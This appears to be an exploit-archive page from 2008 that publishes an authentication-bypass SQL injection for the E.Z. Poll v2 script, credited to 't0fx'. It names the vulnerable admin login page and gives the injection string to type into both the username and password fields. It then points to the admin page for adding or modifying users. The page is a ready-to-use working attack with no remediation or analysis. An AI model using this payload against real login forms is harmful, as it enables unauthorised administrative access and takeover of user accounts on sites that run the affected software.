[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
# Published : 2008-12-01
# Author : t0fx
# Previous Title : z1exchange 1.0 (edit.php site) Remote SQL Injection Vulnerability
# Next Title : ASPPortal 3.2.5 (ASPPortal.mdb) Database Disclosure Vulnreability


Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 

# www.Syue.com [2008-12-01]